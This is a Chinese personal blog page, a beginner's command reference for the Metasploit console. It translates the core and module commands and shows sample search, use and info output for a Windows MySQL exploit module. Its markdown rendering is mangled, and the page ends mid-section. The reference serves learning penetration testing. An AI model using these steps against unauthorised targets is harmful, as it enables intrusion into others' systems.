<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Metasploit手册 | 自留地</title>
  <meta name="keywords" content=" 后渗透工具 ">
  <meta name="description" content="Metasploit手册 | 自留地">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta property="og:type" content="website">
<meta property="og:title" content="标签">
<meta property="og:url" content="http://yoursite.com/tags/index.html">
<meta property="og:site_name" content="自留地">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-02-12T06:32:30.997Z">
<meta property="article:modified_time" content="2020-02-06T09:45:19.822Z">
<meta property="article:author" content="fkrvro">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.0.1" rel="stylesheet">

<link href="/css/hl_theme/school-book.css?v=1.0.1" rel="stylesheet">

<link href="//cdn.bootcss.com/animate.css/3.5.2/animate.min.css" rel="stylesheet">
<link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="/js/jquery.autocomplete.min.js?v=1.0.1" ></script>

<script src="//cdn.bootcss.com/highlight.js/9.12.0/highlight.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.js"></script>



<script src="//cdn.bootcss.com/jquery-cookie/1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.0.1" ></script>

<meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="自留地" type="application/atom+xml">
</head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="false">
  <input class="theme_blog_path" value="">
</div>

<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/" class="avatar_target">
    <img class="avatar" src="/img/avatar.jpg" />
</a>
<div class="author">
    <span>fkrvro</span>
</div>

<div class="icon">
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
</div>




<ul>
    <li><div class="all active">全部文章<small>(33)</small></div></li>
    
        
            
            <li><div data-rel="网络基础">网络基础<small>(12)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="服务搭建">服务搭建<small>(3)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="工具手册">工具手册<small>(8)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="编程基础">编程基础<small>(3)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="漏洞详解">漏洞详解<small>(2)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="编程手册">编程手册<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="错误解决">错误解决<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="面经总结">面经总结<small>(3)</small></div>
                
            </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
    
    
    
    
    </div>
    <div><a  class="friends">友链</a></div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="33">
<input type="hidden" id="yelog_site_word_count" value="106.1k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="back-title-list"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://yelog.org/">叶落阁</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <form onkeydown="if(event.keyCode === 13){return false;}">
        <input id="local-search-input" class="search" type="text" placeholder="以 in: 开头进行全文搜索" />
        <i class="cross"></i>
        <span>
            <label for="tagswitch">Tags:</label>
            <input id="tagswitch" type="checkbox" style="display: none" />
            <i id="tagsWitchIcon"></i>
        </span>
    </form>
    <div class="tags-list">
    
    <li class="article-tag-list-item">
        <a class="color4">tcp/ip协议</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color2">http服务</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color5">网络工具</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color5">系统引导</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color1">后渗透工具</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color4">php</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color2">Python</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color5">文本处理</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color1">web漏洞</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color2">tcp/ip</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color1">C&C++</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color3">shell编程</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color5">文件处理</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color3">面经</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color5">注入工具</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color5">环境搭建</a>
    </li>
    
    <div class="clearfix"></div>
</div>

    
    <div id="local-search-result">

    </div>
    
    <nav id="title-list-nav">
        
        <a  class="网络基础 "
           href="/2020/01/22/ARP%E5%8D%8F%E8%AE%AE/"
           data-tag="tcp/ip协议"
           data-author="" >
            <span class="post-title" title="ARP协议">ARP协议</span>
            <span class="post-date" title="2020-01-22 23:32:12">2020/01/22</span>
        </a>
        
        <a  class="网络基础 "
           href="/2020/01/12/DHCP%E5%8D%8F%E8%AE%AE/"
           data-tag="tcp/ip协议"
           data-author="" >
            <span class="post-title" title="DHCP协议">DHCP协议</span>
            <span class="post-date" title="2020-01-12 23:29:23">2020/01/12</span>
        </a>
        
        <a  class="网络基础 "
           href="/2020/01/11/FTP%E5%8D%8F%E8%AE%AE/"
           data-tag="tcp/ip协议"
           data-author="" >
            <span class="post-title" title="FTP协议">FTP协议</span>
            <span class="post-date" title="2020-01-11 23:28:33">2020/01/11</span>
        </a>
        
        <a  class="网络基础 "
           href="/2020/01/07/DNS%E5%8D%8F%E8%AE%AE/"
           data-tag="tcp/ip协议"
           data-author="" >
            <span class="post-title" title="DNS协议">DNS协议</span>
            <span class="post-date" title="2020-01-07 12:25:02">2020/01/07</span>
        </a>
        
        <a  class="服务搭建 "
           href="/2020/02/26/LAMP%E5%AE%89%E8%A3%85/"
           data-tag="http服务"
           data-author="" >
            <span class="post-title" title="LAMP安装">LAMP安装</span>
            <span class="post-date" title="2020-02-26 13:57:56">2020/02/26</span>
        </a>
        
        <a  class="网络基础 "
           href="/2020/01/17/ICMP%E5%8D%8F%E8%AE%AE/"
           data-tag="tcp/ip协议"
           data-author="" >
            <span class="post-title" title="ICMP协议">ICMP协议</span>
            <span class="post-date" title="2020-01-17 23:31:31">2020/01/17</span>
        </a>
        
        <a  class="网络基础 "
           href="/2020/01/15/IP%E5%8D%8F%E8%AE%AE/"
           data-tag="tcp/ip协议"
           data-author="" >
            <span class="post-title" title="IP协议">IP协议</span>
            <span class="post-date" title="2020-01-15 13:31:09">2020/01/15</span>
        </a>
        
        <a  class="工具手册 "
           href="/2020/02/01/Masscan%E6%89%8B%E5%86%8C/"
           data-tag="网络工具"
           data-author="" >
            <span class="post-title" title="Masscan手册">Masscan手册</span>
            <span class="post-date" title="2020-02-01 13:24:43">2020/02/01</span>
        </a>
        
        <a  class="工具手册 "
           href="/2020/02/08/GRUB%E6%89%8B%E5%86%8C/"
           data-tag="系统引导"
           data-author="" >
            <span class="post-title" title="GRUB手册">GRUB手册</span>
            <span class="post-date" title="2020-02-08 23:40:46">2020/02/08</span>
        </a>
        
        <a  class="工具手册 "
           href="/2020/02/02/NC%E6%89%8B%E5%86%8C/"
           data-tag="网络工具"
           data-author="" >
            <span class="post-title" title="NC手册">NC手册</span>
            <span class="post-date" title="2020-02-02 10:24:46">2020/02/02</span>
        </a>
        
        <a  class="工具手册 "
           href="/2020/01/28/Metasploit%E6%89%8B%E5%86%8C/"
           data-tag="后渗透工具"
           data-author="" >
            <span class="post-title" title="Metasploit手册">Metasploit手册</span>
            <span class="post-date" title="2020-01-28 23:25:12">2020/01/28</span>
        </a>
        
        <a  class="编程基础 "
           href="/2020/02/17/PHP%E5%8F%98%E9%87%8F/"
           data-tag="php"
           data-author="" >
            <span class="post-title" title="PHP变量">PHP变量</span>
            <span class="post-date" title="2020-02-17 17:48:27">2020/02/17</span>
        </a>
        
        <a  class="网络基础 "
           href="/2020/01/13/SMTP%E5%8D%8F%E8%AE%AE/"
           data-tag="tcp/ip协议"
           data-author="" >
            <span class="post-title" title="SMTP协议">SMTP协议</span>
            <span class="post-date" title="2020-01-13 23:29:57">2020/01/13</span>
        </a>
        
        <a  class="编程基础 "
           href="/2020/02/17/Python%E5%8F%98%E9%87%8F/"
           data-tag="Python"
           data-author="" >
            <span class="post-title" title="Python变量">Python变量</span>
            <span class="post-date" title="2020-02-17 18:39:56">2020/02/17</span>
        </a>
        
        <a  class="网络基础 "
           href="/2020/01/09/SSH%E5%8D%8F%E8%AE%AE/"
           data-tag="tcp/ip协议"
           data-author="" >
            <span class="post-title" title="SSH协议">SSH协议</span>
            <span class="post-date" title="2020-01-09 23:26:16">2020/01/09</span>
        </a>
        
        <a  class="工具手册 "
           href="/2020/02/06/VIM%E6%89%8B%E5%86%8C/"
           data-tag="文本处理"
           data-author="" >
            <span class="post-title" title="VIM手册">VIM手册</span>
            <span class="post-date" title="2020-02-06 00:21:49">2020/02/06</span>
        </a>
        
        <a  class="漏洞详解 "
           href="/2020/02/26/SSRF%E6%BC%8F%E6%B4%9E/"
           data-tag="web漏洞"
           data-author="" >
            <span class="post-title" title="SSRF漏洞">SSRF漏洞</span>
            <span class="post-date" title="2020-02-26 13:22:09">2020/02/26</span>
        </a>
        
        <a  class="漏洞详解 "
           href="/2020/02/27/XSS%E6%BC%8F%E6%B4%9E/"
           data-tag="web漏洞"
           data-author="" >
            <span class="post-title" title="XSS漏洞">XSS漏洞</span>
            <span class="post-date" title="2020-02-27 12:41:38">2020/02/27</span>
        </a>
        
        <a  class="网络基础 "
           href="/2020/01/19/TCP%E5%8D%8F%E8%AE%AE/"
           data-tag="tcp/ip协议"
           data-author="" >
            <span class="post-title" title="TCP协议">TCP协议</span>
            <span class="post-date" title="2020-01-19 23:31:57">2020/01/19</span>
        </a>
        
        <a  class="网络基础 "
           href="/2020/01/21/UDP%E5%8D%8F%E8%AE%AE/"
           data-tag="tcp/ip协议"
           data-author="" >
            <span class="post-title" title="UDP协议">UDP协议</span>
            <span class="post-date" title="2020-01-21 09:32:02">2020/01/21</span>
        </a>
        
        <a  class="服务搭建 "
           href="/2020/02/26/WAMP%E5%AE%89%E8%A3%85/"
           data-tag="http服务"
           data-author="" >
            <span class="post-title" title="WAMP安装">WAMP安装</span>
            <span class="post-date" title="2020-02-26 13:58:02">2020/02/26</span>
        </a>
        
        <a  class="网络基础 "
           href="/2020/01/05/http%E5%8D%8F%E8%AE%AE/"
           data-tag="tcp/ip"
           data-author="" >
            <span class="post-title" title="HTTP协议">HTTP协议</span>
            <span class="post-date" title="2020-01-05 14:42:37">2020/01/05</span>
        </a>
        
        <a  class="编程基础 "
           href="/2020/02/20/c-c%E5%8F%98%E9%87%8F/"
           data-tag="C&amp;C++"
           data-author="" >
            <span class="post-title" title="C&amp;C++变量">C&amp;C++变量</span>
            <span class="post-date" title="2020-02-20 00:18:29">2020/02/20</span>
        </a>
        
        <a  class="工具手册 "
           href="/2020/01/25/nmap%E6%89%8B%E5%86%8C/"
           data-tag="网络工具"
           data-author="" >
            <span class="post-title" title="Nmap手册">Nmap手册</span>
            <span class="post-date" title="2020-01-25 23:24:29">2020/01/25</span>
        </a>
        
        <a  class="编程手册 "
           href="/2020/02/26/shell%E6%89%8B%E5%86%8C/"
           data-tag="shell编程"
           data-author="" >
            <span class="post-title" title="shell手册">shell手册</span>
            <span class="post-date" title="2020-02-26 00:06:36">2020/02/26</span>
        </a>
        
        <a  class="工具手册 "
           href="/2020/02/04/wireshark%E6%89%8B%E5%86%8C/"
           data-tag="网络工具"
           data-author="" >
            <span class="post-title" title="wireshark手册">wireshark手册</span>
            <span class="post-date" title="2020-02-04 16:40:50">2020/02/04</span>
        </a>
        
        <a  class="错误解决 "
           href="/2020/02/26/%E6%96%87%E4%BB%B6%E4%B9%B1%E7%A0%81/"
           data-tag="文件处理"
           data-author="" >
            <span class="post-title" title="文件乱码">文件乱码</span>
            <span class="post-date" title="2020-02-26 10:54:27">2020/02/26</span>
        </a>
        
        <a  class="面经总结 "
           href="/2020/02/26/%E7%AC%94%E8%AF%95%E9%9D%A2%E7%BB%8F/"
           data-tag="面经"
           data-author="" >
            <span class="post-title" title="笔试面经">笔试面经</span>
            <span class="post-date" title="2020-02-26 11:06:52">2020/02/26</span>
        </a>
        
        <a  class="工具手册 "
           href="/2020/02/25/sqlmap/"
           data-tag="注入工具"
           data-author="" >
            <span class="post-title" title="sqlmap手册">sqlmap手册</span>
            <span class="post-date" title="2020-02-25 23:24:36">2020/02/25</span>
        </a>
        
        <a  class="服务搭建 "
           href="/2020/01/03/%E4%B8%BB%E6%9C%BA%E7%B3%BB%E7%BB%9F%E5%AE%89%E8%A3%85%E9%85%8D%E7%BD%AE/"
           data-tag="环境搭建"
           data-author="" >
            <span class="post-title" title="主机系统安装配置">主机系统安装配置</span>
            <span class="post-date" title="2020-01-03 14:04:01">2020/01/03</span>
        </a>
        
        <a  class="面经总结 "
           href="/2020/02/26/%E4%BA%BA%E4%BA%8B%E9%9D%A2%E7%BB%8F/"
           data-tag="面经"
           data-author="" >
            <span class="post-title" title="人事面经">人事面经</span>
            <span class="post-date" title="2020-02-26 12:17:19">2020/02/26</span>
        </a>
        
        <a  class="网络基础 "
           href="/2020/01/05/%E7%BD%91%E7%BB%9C%E6%A8%A1%E5%9E%8B/"
           data-tag="tcp/ip"
           data-author="" >
            <span class="post-title" title="网络模型">网络模型</span>
            <span class="post-date" title="2020-01-05 14:34:30">2020/01/05</span>
        </a>
        
        <a  class="面经总结 "
           href="/2020/02/26/%E6%8A%80%E6%9C%AF%E9%9D%A2%E7%BB%8F/"
           data-tag="面经"
           data-author="" >
            <span class="post-title" title="面试面经">面试面经</span>
            <span class="post-date" title="2020-02-26 11:07:03">2020/02/26</span>
        </a>
        
    </nav>
</div>
    </div>
    <div class="hide-list">
        <div class="semicircle">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div class="post">
    <div class="pjax">
        <article id="post-Metasploit手册" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">Metasploit手册</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            
                <a  data-rel="工具手册">工具手册</a>
            
        </span>
        
        
        <span class="tag">
            
            <a class="color1">后渗透工具</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
        创建时间:<time class="date" title='更新时间: 2020-02-25 23:09:03'>2020-01-28 23:25</time>
        
    </div>
    <div class="article-meta">
        
        <span>字数:3.7k</span>
        
        
        <span id="busuanzi_container_page_pv">
            阅读:<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#msf基本命令"><span class="toc-text">msf基本命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#所有命令"><span class="toc-text">所有命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#帮助命令"><span class="toc-text">帮助命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#核心命令"><span class="toc-text">核心命令</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-4 i,
    .toc-level-4 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="msf基本命令"><a href="#msf基本命令" class="headerlink" title="msf基本命令"></a>msf基本命令</h2><h3 id="所有命令"><a href="#所有命令" class="headerlink" title="所有命令"></a>所有命令</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">?</span><br><span class="line">核心命令</span><br><span class="line">&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</span><br><span class="line">？   帮助菜单</span><br><span class="line">banner   显示一个真棒metasploit横幅</span><br><span class="line">cd   更改当前的工作目录</span><br><span class="line">color   切换颜色</span><br><span class="line">connect   连接与主机通信</span><br><span class="line">exit   退出控制台</span><br><span class="line">get   获取特定于上下文的变量的值</span><br><span class="line">getg   获取全局变量的值</span><br><span class="line">grep grep另一个命令的输出</span><br><span class="line">help   帮助菜单</span><br><span class="line">history   显示命令历史</span><br><span class="line">irb   进入irb脚本模式</span><br><span class="line">load   加载一个框架插件</span><br><span class="line">quit   退出控制台</span><br><span class="line">route   通过会话路由流量</span><br><span class="line">save   保存活动的数据存储</span><br><span class="line">sessions    转储会话列表并显示有关会话的信息</span><br><span class="line">set   将特定于上下文的变量设置为一个值</span><br><span class="line">setg   将全局变量设置为一个值</span><br><span class="line">sleep   在指定的秒数内不做任何事情</span><br><span class="line">spool   将控制台输出写入文件以及屏幕</span><br><span class="line">threads   线程查看和操作后台线程</span><br><span class="line">unload   卸载框架插件</span><br><span class="line">unset   取消设置一个或多个特定于上下文的变量</span><br><span class="line">unsetg   取消设置一个或多个全局变量</span><br><span class="line">version   显示框架和控制台库版本号</span><br><span class="line">模块命令</span><br><span class="line">&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</span><br><span class="line">advanced   显示一个或多个模块的高级选项</span><br><span class="line">back   从当前上下文返回</span><br><span class="line">edit   使用首选编辑器编辑当前模块</span><br><span class="line">info   显示有关一个或多个模块的信息</span><br><span class="line">loadpath   路径从路径搜索并加载模块</span><br><span class="line">options   显示全局选项或一个或多个模块</span><br><span class="line">popm   将最新的模块从堆栈中弹出并使其处于活动状态</span><br><span class="line">previous   将之前加载的模块设置为当前模块</span><br><span class="line">pushm   将活动或模块列表推入模块堆栈</span><br><span class="line">reload_all   从所有定义的模块路径重新加载所有模块</span><br><span class="line">search   搜索模块名称和描述</span><br><span class="line">show   显示给定类型的模块或所有模块</span><br><span class="line">use   按名称选择模块</span><br><span class="line">工作命令</span><br><span class="line">&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</span><br><span class="line">handler   作为作业启动负载处理程序</span><br><span class="line">jobs   显示和管理作业</span><br><span class="line">kill   杀死一个工作</span><br><span class="line">rename_job   重命名作业</span><br><span class="line">资源脚本命令</span><br><span class="line">&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</span><br><span class="line">makerc   保存从开始到文件输入的命令</span><br><span class="line">resource   运行存储在文件中的命令</span><br><span class="line">数据库后端命令</span><br><span class="line">&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</span><br><span class="line">db_connect   连接到现有的数据库</span><br><span class="line">db_disconnect   断开与当前数据库实例的连接</span><br><span class="line">db_export   导出包含数据库内容的文件</span><br><span class="line">db_import   导入扫描结果文件（文件类型将被自动检测）</span><br><span class="line">db_nmap   执行nmap并自动记录输出</span><br><span class="line">db_rebuild_cache   重建数据库存储的模块高速缓存</span><br><span class="line">db_status   显示当前的数据库状态</span><br><span class="line">hosts   列出数据库中的所有主机</span><br><span class="line">loot   列出数据库中的所有战利品</span><br><span class="line">notes   列出数据库中的所有笔记</span><br><span class="line">services   列出数据库中的所有服务</span><br><span class="line">vulns   列出数据库中的所有漏洞</span><br><span class="line">workspace   在数据库工作区之间切换</span><br><span class="line">凭证后端命令</span><br><span class="line">&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</span><br><span class="line">creds   列出数据库中的所有凭据</span><br><span class="line">&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</span><br></pre></td></tr></table></figure>

<h3 id="帮助命令"><a href="#帮助命令" class="headerlink" title="帮助命令"></a>帮助命令</h3><p>在msf中关于help功能，有三种方式，分别是 “?” 、“help”、“-h”。<br>系统命令的习惯也是保留的</p>
<ol>
<li>show<br>它的作用是显示当前所有可利用资源,</li>
</ol>
<ul>
<li>正常使用的时候，show 模块名称就可以了。</li>
<li>show options 查看需要配置的选项</li>
<li>show missing 是显示缺失的必填项。</li>
<li>show payload 如果你的所查询漏洞是只在lunix平台下的，出来的只会是针对lunix平台的payloads</li>
</ul>
<ol>
<li><h3 id="核心命令"><a href="#核心命令" class="headerlink" title="核心命令"></a>核心命令</h3></li>
<li><p>connect</p>
</li>
</ol>
<ul>
<li><p>瑞士军刀netcat</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"> </span><br></pre></td></tr></table></figure>
</li>
<li><pre><code>[*] Connected to 127.0.0.1:22
SSH-2.0-OpenSSH_8.0
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">1. search</span><br><span class="line"></span><br><span class="line">- search的功能可以让我们随时在msf的海量脚本中拿到我们想要的。</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">-</span><br></pre></td></tr></table></figure>
msf5 &gt; search mysql

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank       Check  Description
   -   ----                                                  ---------------  ----       -----  -----------
   0   auxiliary/admin/http/manageengine_pmp_privesc         2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">1. use</span><br><span class="line"></span><br><span class="line">- 使用选中模块</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">-</span><br></pre></td></tr></table></figure>
msf5 &gt; use exploit/windows/mysql/mysql_start_up
msf5 exploit(windows/mysql/mysql_start_up) &gt;
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">1. info</span><br><span class="line"></span><br><span class="line">- info命令用于查看当前模块信息</span><br><span class="line"></span><br><span class="line">- basic options 中的内容就是我们需要配置的内容。</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">-</span><br></pre></td></tr></table></figure>
msf5 exploit(windows/mysql/mysql_start_up) &gt; info windows/mysql/mysql_start_up

       Name: Oracle MySQL for Microsoft Windows FILE Privilege Abuse
     Module: exploit/windows/mysql/mysql_start_up
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-12-01
.............
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">1. set</span><br><span class="line"></span><br><span class="line">- set命令进行赋值操作。</span><br><span class="line"></span><br><span class="line">1. edit</span><br><span class="line"></span><br><span class="line">- 其实就是以vi命令打开选中的脚本文件</span><br><span class="line"></span><br><span class="line">1. unset </span><br><span class="line"></span><br><span class="line">- 取消赋值</span><br><span class="line"></span><br><span class="line">1. run&#x2F;exploit 这</span><br><span class="line"></span><br><span class="line">- 两个命令都是运行脚本，其实功能完全一致，只是习惯上exploit再exploits模块下 使用，仅此而已。</span><br><span class="line"></span><br><span class="line">1. job&#x2F;kill</span><br><span class="line"></span><br><span class="line">- jobs命令在你运行脚本的时候会记录工作进程，kill对应干掉它（随着我跟开发接触越来越多，发现老开发从不说删掉，都是干掉！干掉！干掉！！</span><br><span class="line"></span><br><span class="line">1. sessions</span><br><span class="line"></span><br><span class="line">- 当你的脚本与目标服务器建立链接，或者说拿到了shell时，你输入sessions命令可以看到具体的监听端口。</span><br><span class="line"></span><br><span class="line">1. resource </span><br><span class="line"></span><br><span class="line">- 可以直接执行我们预定好的操作</span><br><span class="line"></span><br><span class="line">## msf模块</span><br><span class="line"></span><br><span class="line">### MSF架构</span><br><span class="line"></span><br><span class="line">1. Rex功能库实际来讲并不属于MSF，为什么这么讲呢？如HTTP&#x2F;TELNET&#x2F;SSH等连接功能严格来讲是属于操作系统自带的功能，MSF只是去以一个用户的身份去调用它而已；同理上述提到的编码功能。</span><br><span class="line">2. Core库是真正属于MSF的最底层的库，其中包含的都是MSF框架的底层功能，如数据管理，session管理，插件管理这些核心底层功能。</span><br><span class="line">3. Base库是在针对Core库进行进一步人性化的拓展的库，算作一个中间层，为开发者提供API以轻松调用MSF的功能，我们使用的各种插件，我们上期提到的console接口，还有收费版的UI界面，以及自己开发的插件，都是在base库的基础上进一步拓展的。</span><br><span class="line">4. Plugin插件，这里提到的插件与我刚刚讲到的有略微差异，他这里提到的插件指的是成熟的工具&#x2F;软件，如各种成熟的扫描器，老牌扫描厂商的存在，已经不需要MSF再去开发新的插件啦，直接调用就好啦。</span><br><span class="line"></span><br><span class="line">### 